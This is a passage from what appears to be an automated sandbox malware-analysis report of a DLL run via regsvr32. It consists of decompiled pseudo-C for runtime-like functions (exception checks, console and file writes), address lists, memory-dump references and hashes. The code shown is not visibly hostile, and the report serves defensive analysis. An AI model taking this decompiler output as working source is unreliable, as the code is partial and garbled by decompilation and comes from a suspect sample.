				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00000001180002D40(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x800038c3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x800038c3;
				return _t19;
			}















                                                                                                                                                                                                            0x180003800
                                                                                                                                                                                                            0x180003803
                                                                                                                                                                                                            0x180003807
                                                                                                                                                                                                            0x18000380b
                                                                                                                                                                                                            0x18000381a
                                                                                                                                                                                                            0x18000381e
                                                                                                                                                                                                            0x180003834
                                                                                                                                                                                                            0x180003836
                                                                                                                                                                                                            0x18000383b
                                                                                                                                                                                                            0x180003848
                                                                                                                                                                                                            0x18000384c
                                                                                                                                                                                                            0x180003855
                                                                                                                                                                                                            0x18000385e
                                                                                                                                                                                                            0x180003867
                                                                                                                                                                                                            0x180003870
                                                                                                                                                                                                            0x180003874
                                                                                                                                                                                                            0x180003884
                                                                                                                                                                                                            0x18000388c
                                                                                                                                                                                                            0x180003891
                                                                                                                                                                                                            0x180003896
                                                                                                                                                                                                            0x18000389b
                                                                                                                                                                                                            0x1800038a2
                                                                                                                                                                                                            0x1800038be

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                            • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                                                                                                                            • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000D5B8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                            			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t183;
				signed int _t187;
				signed int _t194;
				signed int _t199;
				intOrPtr _t208;
				void* _t210;
				signed char _t211;
				void* _t261;
				signed long long _t262;
				long long _t267;
				long long _t269;
				void* _t270;
				long long _t272;
				intOrPtr* _t278;
				intOrPtr* _t285;
				long long _t287;
				long long _t313;
				void* _t321;
				long long _t322;
				void* _t323;
				long long _t324;
				long long _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				signed long long _t333;
				intOrPtr _t336;
				intOrPtr _t339;
				void* _t341;
				signed long long _t343;
				signed long long _t345;
				long long _t354;
				void* _t358;
				long long _t359;
				signed long long _t362;
				char _t363;
				signed long long _t364;
				void* _t367;
				signed char* _t368;
				signed long long _t370;

				_t261 = _t332;
				_t331 = _t261 - 0x57;
				_t333 = _t332 - 0xd0;
				 *((long long*)(_t331 - 9)) = 0xfffffffe;
				 *((long long*)(_t261 + 8)) = __rbx;
				_t262 =  *0x80021010; // 0xc23e8d4af72c
				 *(_t331 + 0x17) = _t262 ^ _t333;
				 *((long long*)(_t331 - 0x41)) = __r8;
				_t278 = __rcx;
				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
				_t362 = __edx >> 6;
				 *(_t331 - 0x39) = _t362;
				_t370 = __edx + __edx * 8;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
				 *((long long*)(_t331 - 0x19)) = _t267;
				r12d = r9d;
				_t359 = _t358 + __r8;
				 *((long long*)(_t331 - 0x61)) = _t359;
				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
				0x80006f60();
				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
				 *((long long*)(__rcx)) = _t267;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
				_t343 = __edx >> 6;
				 *(_t331 - 0x11) = _t343;
				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
				r12d = 1;
				if (_t208 != 0xfde9) goto 0x8000d81d;
				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
				if ( *_t285 == dil) goto 0x8000d6ca;
				_t367 = _t324 + 1;
				if (_t367 - 5 < 0) goto 0x8000d6b7;
				if (_t367 <= 0) goto 0x8000d7b3;
				r12d =  *((char*)(_t285 + 0x1800218d1));
				r12d = r12d + 1;
				_t183 = r12d - 1;
				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
				_t336 = _t183;
				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
				_t287 = _t324;
				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
				if (_t336 <= 0) goto 0x8000d74b;
				0x80004b30();
				_t354 =  *((intOrPtr*)(_t331 - 0x59));
				_t313 = _t324;
				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
				 *((long long*)(_t331 - 0x31)) = _t324;
				_t269 = _t331 - 1;
				 *((long long*)(_t331 - 0x29)) = _t269;
				_t187 = (0 | r12d == 0x00000004) + 1;
				r12d = _t187;
				r8d = _t187;
				 *((long long*)(_t333 + 0x20)) = _t354;
				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
				if (_t269 == 0xffffffff) goto 0x8000da03;
				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
				goto 0x8000d8ae;
				_t363 =  *((char*)(_t269 + 0x1800218d0));
				_t210 = _t363 + 1;
				_t270 = _t210;
				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
				 *((long long*)(_t331 - 0x51)) = _t324;
				 *((long long*)(_t331 - 0x21)) = _t326;
				_t194 = (0 | _t210 == 0x00000004) + 1;
				r14d = _t194;
				r8d = _t194;
				 *((long long*)(_t333 + 0x20)) = _t354;
				_t345 = _t331 - 0x51;
				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
				if (_t270 == 0xffffffff) goto 0x8000da03;
				_t327 = _t326 + _t363;
				r12d = r14d;
				_t364 =  *(_t331 - 0x39);
				goto 0x8000d8ae;
				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
				_t211 =  *(_t339 + 0x3d + _t370 * 8);
				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
				 *((char*)(_t331 + 8)) =  *_t327;
				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
				r8d = 2;
				goto 0x8000d899;
				r9d =  *_t327 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
				_t368 =  &(_t327[1]);
				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
				r8d = 2;
				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
				_t328 = _t368;
				goto 0x8000d8ae;
				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
				if (_t199 == 0xffffffff) goto 0x8000da03;
				_t329 =  &(_t328[1]);
				 *((long long*)(_t333 + 0x38)) = _t324;
				 *((long long*)(_t333 + 0x30)) = _t324;
				 *((intOrPtr*)(_t333 + 0x28)) = 5;
				_t272 = _t331 + 0xf;
				 *((long long*)(_t333 + 0x20)) = _t272;
				r9d = r12d;
				_t341 = _t331 - 0x6d;
				E0000000118000A154();
				r14d = _t199;
				if (_t199 == 0) goto 0x8000da03;
				 *((long long*)(_t333 + 0x20)) = _t324;
				r8d = _t199;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
				 *((short*)(_t331 - 0x71)) = 0xd;
				 *((long long*)(_t333 + 0x20)) = _t324;
				_t130 = _t272 - 0xc; // 0x1
				r8d = _t130;
				_t321 = _t331 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
				goto 0x8000d681;
				if (_t321 <= 0) goto 0x8000d9a9;
				_t330 = _t329 - _t368;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
				if (1 - _t321 < 0) goto 0x8000d988;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
				goto 0x8000da03;
				if (_t341 <= 0) goto 0x8000d9da;
				_t322 = _t324;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
				_t323 = _t322 + 1;
				if (2 - _t341 < 0) goto 0x8000d9ba;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
				goto 0x8000da03;
				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
				_t173 = _t323 + 1; // 0x1
				 *((intOrPtr*)(_t278 + 4)) = _t173;
				goto 0x8000da03;
				 *_t278 = GetLastError();
				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
			}

















































                                                                                                                                                                                                            0x18000d5b8
                                                                                                                                                                                                            0x18000d5c6
                                                                                                                                                                                                            0x18000d5ca
                                                                                                                                                                                                            0x18000d5d1
                                                                                                                                                                                                            0x18000d5d9
                                                                                                                                                                                                            0x18000d5dd
                                                                                                                                                                                                            0x18000d5e7
                                                                                                                                                                                                            0x18000d5ee
                                                                                                                                                                                                            0x18000d5f5
                                                                                                                                                                                                            0x18000d5fc
                                                                                                                                                                                                            0x18000d606
                                                                                                                                                                                                            0x18000d60a
                                                                                                                                                                                                            0x18000d618
                                                                                                                                                                                                            0x18000d624
                                                                                                                                                                                                            0x18000d629
                                                                                                                                                                                                            0x18000d62d
                                                                                                                                                                                                            0x18000d630
                                                                                                                                                                                                            0x18000d633
                                                                                                                                                                                                            0x18000d63d
                                                                                                                                                                                                            0x18000d64a
                                                                                                                                                                                                            0x18000d64f
                                                                                                                                                                                                            0x18000d65c
                                                                                                                                                                                                            0x18000d65f
                                                                                                                                                                                                            0x18000d664
                                                                                                                                                                                                            0x18000d667
                                                                                                                                                                                                            0x18000d66e
                                                                                                                                                                                                            0x18000d677
                                                                                                                                                                                                            0x18000d67b
                                                                                                                                                                                                            0x18000d683
                                                                                                                                                                                                            0x18000d686
                                                                                                                                                                                                            0x18000d689
                                                                                                                                                                                                            0x18000d69c
                                                                                                                                                                                                            0x18000d6af
                                                                                                                                                                                                            0x18000d6ba
                                                                                                                                                                                                            0x18000d6be
                                                                                                                                                                                                            0x18000d6c8
                                                                                                                                                                                                            0x18000d6cd
                                                                                                                                                                                                            0x18000d6e1
                                                                                                                                                                                                            0x18000d6ea
                                                                                                                                                                                                            0x18000d6f0
                                                                                                                                                                                                            0x18000d6f2
                                                                                                                                                                                                            0x18000d6fc
                                                                                                                                                                                                            0x18000d702
                                                                                                                                                                                                            0x18000d708
                                                                                                                                                                                                            0x18000d71d
                                                                                                                                                                                                            0x18000d72a
                                                                                                                                                                                                            0x18000d72f
                                                                                                                                                                                                            0x18000d73b
                                                                                                                                                                                                            0x18000d740
                                                                                                                                                                                                            0x18000d74b
                                                                                                                                                                                                            0x18000d759
                                                                                                                                                                                                            0x18000d764
                                                                                                                                                                                                            0x18000d766
                                                                                                                                                                                                            0x18000d76a
                                                                                                                                                                                                            0x18000d76e
                                                                                                                                                                                                            0x18000d77b
                                                                                                                                                                                                            0x18000d77d
                                                                                                                                                                                                            0x18000d780
                                                                                                                                                                                                            0x18000d783
                                                                                                                                                                                                            0x18000d794
                                                                                                                                                                                                            0x18000d79d
                                                                                                                                                                                                            0x18000d7ab
                                                                                                                                                                                                            0x18000d7ae
                                                                                                                                                                                                            0x18000d7b6
                                                                                                                                                                                                            0x18000d7bf
                                                                                                                                                                                                            0x18000d7ca
                                                                                                                                                                                                            0x18000d7d0
                                                                                                                                                                                                            0x18000d7d6
                                                                                                                                                                                                            0x18000d7da
                                                                                                                                                                                                            0x18000d7e6
                                                                                                                                                                                                            0x18000d7e8
                                                                                                                                                                                                            0x18000d7eb
                                                                                                                                                                                                            0x18000d7ee
                                                                                                                                                                                                            0x18000d7f3
                                                                                                                                                                                                            0x18000d7ff
                                                                                                                                                                                                            0x18000d808
                                                                                                                                                                                                            0x18000d80e
                                                                                                                                                                                                            0x18000d811
                                                                                                                                                                                                            0x18000d814
                                                                                                                                                                                                            0x18000d818
                                                                                                                                                                                                            0x18000d81d
                                                                                                                                                                                                            0x18000d825
                                                                                                                                                                                                            0x18000d82d
                                                                                                                                                                                                            0x18000d834
                                                                                                                                                                                                            0x18000d839
                                                                                                                                                                                                            0x18000d83f
                                                                                                                                                                                                            0x18000d844
                                                                                                                                                                                                            0x18000d84e
                                                                                                                                                                                                            0x18000d850
                                                                                                                                                                                                            0x18000d860
                                                                                                                                                                                                            0x18000d862
                                                                                                                                                                                                            0x18000d86a
                                                                                                                                                                                                            0x18000d873
                                                                                                                                                                                                            0x18000d888
                                                                                                                                                                                                            0x18000d88e
                                                                                                                                                                                                            0x18000d891
                                                                                                                                                                                                            0x18000d8a0
                                                                                                                                                                                                            0x18000d8a8
                                                                                                                                                                                                            0x18000d8ae
                                                                                                                                                                                                            0x18000d8b1
                                                                                                                                                                                                            0x18000d8b6
                                                                                                                                                                                                            0x18000d8bb
                                                                                                                                                                                                            0x18000d8c3
                                                                                                                                                                                                            0x18000d8c7
                                                                                                                                                                                                            0x18000d8cc
                                                                                                                                                                                                            0x18000d8cf
                                                                                                                                                                                                            0x18000d8d8
                                                                                                                                                                                                            0x18000d8dd
                                                                                                                                                                                                            0x18000d8e2
                                                                                                                                                                                                            0x18000d8e8
                                                                                                                                                                                                            0x18000d8f1
                                                                                                                                                                                                            0x18000d907
                                                                                                                                                                                                            0x18000d915
                                                                                                                                                                                                            0x18000d91c
                                                                                                                                                                                                            0x18000d926
                                                                                                                                                                                                            0x18000d92d
                                                                                                                                                                                                            0x18000d931
                                                                                                                                                                                                            0x18000d93a
                                                                                                                                                                                                            0x18000d93a
                                                                                                                                                                                                            0x18000d93e
                                                                                                                                                                                                            0x18000d94d
                                                                                                                                                                                                            0x18000d957
                                                                                                                                                                                                            0x18000d95d
                                                                                                                                                                                                            0x18000d960
                                                                                                                                                                                                            0x18000d96a
                                                                                                                                                                                                            0x18000d97b
                                                                                                                                                                                                            0x18000d983
                                                                                                                                                                                                            0x18000d985
                                                                                                                                                                                                            0x18000d997
                                                                                                                                                                                                            0x18000d9a7
                                                                                                                                                                                                            0x18000d9a9
                                                                                                                                                                                                            0x18000d9ac
                                                                                                                                                                                                            0x18000d9b1
                                                                                                                                                                                                            0x18000d9b3
                                                                                                                                                                                                            0x18000d9c8
                                                                                                                                                                                                            0x18000d9cf
                                                                                                                                                                                                            0x18000d9d8
                                                                                                                                                                                                            0x18000d9da
                                                                                                                                                                                                            0x18000d9de
                                                                                                                                                                                                            0x18000d9e0
                                                                                                                                                                                                            0x18000d9ed
                                                                                                                                                                                                            0x18000d9f3
                                                                                                                                                                                                            0x18000d9f6
                                                                                                                                                                                                            0x18000d9f9
                                                                                                                                                                                                            0x18000da01
                                                                                                                                                                                                            0x18000da2c

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                            • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                                                                                                                            • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000DEE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 28%
                                                                                                                                                                                                            			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed long long _v88;
				void* _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t159;
				signed short _t167;
				signed long long _t180;
				signed int _t184;
				signed short* _t197;
				signed int _t204;
				signed int _t205;
				signed short* _t206;
				void* _t208;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t197 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t184 = __r9;
				_t206 = __rdx;
				if (r8d == 0) goto 0x8000e1d3;
				if (__rdx != 0) goto 0x8000df47;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t205;
				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
				goto 0x8000e1d5;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
				_t23 = _t197 + 2; // 0x2
				r8d = _t23;
				E0000000118000E958(r15d);
				_v112 = _t205;
				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
				0x80006f60();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
				_t127 = _v136;
				_t159 = _t127;
				if (_t159 == 0) goto 0x8000e099;
				if (_t159 == 0) goto 0x8000e024;
				if (_t127 - 1 != 1) goto 0x8000e15d;
				_t221 = _t206 + _t224;
				_v128 = _t205;
				_t226 = _t206;
				if (_t206 - _t221 >= 0) goto 0x8000e090;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E0000000118000E960( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0x8000e087;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0x8000e07c;
				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
				goto 0x8000e038;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0x8000e153;
				r9d = r14d;
				_v152 = __r9;
				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
				asm("movsd xmm0, [eax]");
				goto 0x8000e158;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
				_t133 = _v136;
				_t167 = _t133;
				if (_t167 == 0) goto 0x8000e10c;
				if (_t167 == 0) goto 0x8000e0f8;
				if (_t133 - 1 != 1) goto 0x8000e164;
				r9d = r14d;
				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r8d = r14d;
				_v152 = _v152 & _t180;
				_v128 = _t180;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0x8000e1cc;
				_t117 = _v112;
				if (_t117 == 0) goto 0x8000e1a3;
				if (_t117 != 5) goto 0x8000e193;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x8000df3f;
				_t204 = _t184;
				E000000011800086B0(_v112, _t204);
				goto 0x8000df3f;
				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
				if ( *_t206 == 0x1a) goto 0x8000e1d3;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x8000df3f;
				goto 0x8000e1d5;
				return 0;
			}







































                                                                                                                                                                                                            0x18000dee0
                                                                                                                                                                                                            0x18000dee0
                                                                                                                                                                                                            0x18000def6
                                                                                                                                                                                                            0x18000defc
                                                                                                                                                                                                            0x18000deff
                                                                                                                                                                                                            0x18000df05
                                                                                                                                                                                                            0x18000df0e
                                                                                                                                                                                                            0x18000df10
                                                                                                                                                                                                            0x18000df15
                                                                                                                                                                                                            0x18000df18
                                                                                                                                                                                                            0x18000df1e
                                                                                                                                                                                                            0x18000df25
                                                                                                                                                                                                            0x18000df2d
                                                                                                                                                                                                            0x18000df30
                                                                                                                                                                                                            0x18000df35
                                                                                                                                                                                                            0x18000df3a
                                                                                                                                                                                                            0x18000df42
                                                                                                                                                                                                            0x18000df57
                                                                                                                                                                                                            0x18000df5b
                                                                                                                                                                                                            0x18000df5f
                                                                                                                                                                                                            0x18000df67
                                                                                                                                                                                                            0x18000df6c
                                                                                                                                                                                                            0x18000df73
                                                                                                                                                                                                            0x18000df7c
                                                                                                                                                                                                            0x18000df84
                                                                                                                                                                                                            0x18000df8b
                                                                                                                                                                                                            0x18000df8b
                                                                                                                                                                                                            0x18000df8f
                                                                                                                                                                                                            0x18000df97
                                                                                                                                                                                                            0x18000dfa9
                                                                                                                                                                                                            0x18000dfb8
                                                                                                                                                                                                            0x18000dfc2
                                                                                                                                                                                                            0x18000dfc7
                                                                                                                                                                                                            0x18000dfde
                                                                                                                                                                                                            0x18000dfe0
                                                                                                                                                                                                            0x18000dfe9
                                                                                                                                                                                                            0x18000e004
                                                                                                                                                                                                            0x18000e00a
                                                                                                                                                                                                            0x18000e00e
                                                                                                                                                                                                            0x18000e010
                                                                                                                                                                                                            0x18000e019
                                                                                                                                                                                                            0x18000e01e
                                                                                                                                                                                                            0x18000e024
                                                                                                                                                                                                            0x18000e028
                                                                                                                                                                                                            0x18000e02c
                                                                                                                                                                                                            0x18000e032
                                                                                                                                                                                                            0x18000e034
                                                                                                                                                                                                            0x18000e03f
                                                                                                                                                                                                            0x18000e043
                                                                                                                                                                                                            0x18000e048
                                                                                                                                                                                                            0x18000e04f
                                                                                                                                                                                                            0x18000e051
                                                                                                                                                                                                            0x18000e055
                                                                                                                                                                                                            0x18000e05d
                                                                                                                                                                                                            0x18000e071
                                                                                                                                                                                                            0x18000e073
                                                                                                                                                                                                            0x18000e076
                                                                                                                                                                                                            0x18000e083
                                                                                                                                                                                                            0x18000e085
                                                                                                                                                                                                            0x18000e08d
                                                                                                                                                                                                            0x18000e090
